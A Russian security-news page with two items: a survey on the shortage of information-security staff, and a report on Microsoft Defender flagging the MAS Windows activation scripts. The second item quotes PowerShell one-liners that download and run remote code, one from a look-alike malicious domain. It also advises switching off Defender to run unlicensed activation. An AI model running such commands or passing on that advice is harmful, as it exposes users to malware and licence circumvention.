Новый опрос выявил дефицит ИБ-кадров в 41% компаний

Новый опрос выявил дефицит ИБ-кадров в 41% компаний

Новый опрос выявил дефицит ИБ-кадров в 41% компаний

Глобальный опрос, проведенный по заказу «Лаборатории Касперского», показал, что 41% компаний остро нуждаются в специалистах по ИБ. Больше прочих востребованы эксперты по ИБ-угрозам и специалисты по анализу вредоносных программ (по 39%).

Наблюдается также нехватка SOC-аналитиков (35%), специалистов по пентесту и сетевой безопасности (33%), аналитиков профиля Threat Intelligence (32%).

В разделении по отраслям дефицит ИБ-кадров более всего ощущается в госсекторе, где не закрыта почти половина подобных вакансий (46%). Второе место в этом рейтинге заняли телеком и медиа (39%), третье — ретейл и здравоохранение (по 37%). Лучше всего направление ИБ прикрыто в ИТ-индустрии и сфере финансов (31 и 27% соответственно).

В опросе, проведенном Grand View Research в 29 странах (включая Россию), приняли участие 1012 представителей компаний, занимающие различные должности: руководители (ИТ, SOC), ведущие специалисты, эксперты по ИБ.

«Мы видим высокий спрос, в частности, на инженеров внедрения средств защиты информации и SOC-аналитиков, а также специалистов по безопасной разработке, — отметил Владислав Галимов, руководитель группы подбора персонала по направлению ИБ в Kaspersky. — К тому же полагаем, что в ближайшем будущем начнёт расти потребность в экспертах в области безопасности ИИ и нейросетей».

Похожие результаты дало аналогичное исследование рынка труда в сфере ИБ, проведенное в Angara Security. По оценке сервис-провайдера, в прошлом году число связанных с ИБ вакансий возросло на 27%.

Аналитики из Positive Technologies и Фонда «Центр стратегических разработок “Северо-Запад”» ожидают, что в 2027 году спрос на ИБ-специалистов в России увеличится до 235-261 тыс. человек, а дефицит таких кадров составит 54-65 тысяч.

По мнению экспертов, растущая нехватка ИБ-кадров напрямую связана с общим курсом на цифровизацию экономики и с ужесточением требований регуляторов к безопасности в условиях роста числа и сложности кибератак.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru